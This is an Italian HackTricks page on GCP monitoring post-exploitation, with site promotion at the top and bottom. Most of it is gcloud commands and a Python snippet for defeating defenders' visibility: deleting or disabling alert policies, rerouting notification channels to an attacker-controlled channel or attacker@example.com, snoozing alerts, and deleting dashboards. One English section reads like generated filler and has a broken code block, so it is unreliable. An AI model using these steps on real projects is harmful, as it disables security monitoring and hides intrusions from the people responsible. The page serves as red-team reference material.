GCP - Monitoring Post Exploitation

Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

Se vuoi vedere la tua azienda pubblicizzata in HackTricks o scaricare HackTricks in PDF Controlla i PACCHETTI DI ABBONAMENTO!
Ottieni il merchandising ufficiale di PEASS & HackTricks
Scopri The PEASS Family, la nostra collezione di esclusive NFT
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi i tuoi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud github repos.

Monitoraggio

Per ulteriori informazioni, controlla:

pageGCP - Monitoring Enum

Per altre modalità di interruzione dei log, controlla:

pageGCP - Logging Post Exploitation

`monitoring.alertPolicies.delete`

Elimina una policy di allerta:

gcloud alpha monitoring policies delete <policy>

`monitoring.alertPolicies.update`

Interrompere una policy di allerta:

To disrupt an alert policy, you can use the `monitoring.alertPolicies.update` method. This method allows you to modify the configuration of an existing alert policy, which can include disabling or modifying the conditions, actions, and notification channels associated with the policy.

To disrupt an alert policy, you need to provide the project ID, the alert policy ID, and the updated configuration. The updated configuration should include the changes you want to make to the policy.

Keep in mind that disrupting an alert policy can have consequences, such as disabling important notifications or triggering false alarms. Therefore, it is important to carefully review and test the changes before applying them.

Here is an example of how to use the `monitoring.alertPolicies.update` method to disrupt an alert policy:

```python
from google.cloud import monitoring_v3

def disrupt_alert_policy(project_id, policy_id, updated_config):
    client = monitoring_v3.AlertPolicyServiceClient()
    policy_name = client.alert_policy_path(project_id, policy_id)
    policy = client.get_alert_policy(name=policy_name)
    policy.conditions = updated_config.conditions
    policy.actions = updated_config.actions
    policy.notification_channels = updated_config.notification_channels
    client.update_alert_policy(policy=policy)

In this example, the disrupt_alert_policy function takes the project ID, policy ID, and updated configuration as parameters. It creates a client for the AlertPolicyService, retrieves the existing alert policy using the provided project ID and policy ID, updates the policy's conditions, actions, and notification channels with the provided configuration, and finally updates the alert policy using the update_alert_policy method.

Remember to handle any errors that may occur during the disruption process and to ensure that you have the necessary permissions to modify alert policies.

# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled

# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels

# Chnage notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL

# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>

`monitoring.dashboards.update`

Modifica un cruscotto per interromperlo:

# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
widgets:
- text:
content: Hello World
'''

`monitoring.dashboards.delete`

Elimina una dashboard:

# Delete dashboard
gcloud monitoring dashboards delete <dashboard>

`monitoring.snoozes.create`

Prevenire che le politiche generino avvisi creando un snoozer:

# Stop alerts by creating a snoozer
gcloud monitoring snoozes create --display-name="Maintenance Week" \
--criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
--start-time="2023-03-01T03:00:00.0-0500" \
--end-time="2023-03-07T23:59:59.5-0500"

`monitoring.snoozes.update`

Aggiorna il tempo di un snoozer per evitare che vengano creati avvisi quando l'attaccante è interessato:

# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME

# odify everything, including affected policies
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>

`monitoring.notificationChannels.delete`

Elimina un canale configurato:

# Delete channel
gcloud alpha monitoring channels delete <channel>

`monitoring.notificationChannels.update`

Aggiorna le etichette di un canale per interromperlo:

# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com

Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
Ottieni il merchandising ufficiale di PEASS & HackTricks
Scopri The PEASS Family, la nostra collezione di esclusive NFT
Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi i tuoi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos di github.

PreviousGCP - Logging Post Exploitation NextGCP - Pub/Sub Post Exploitation

Last updated 2 months ago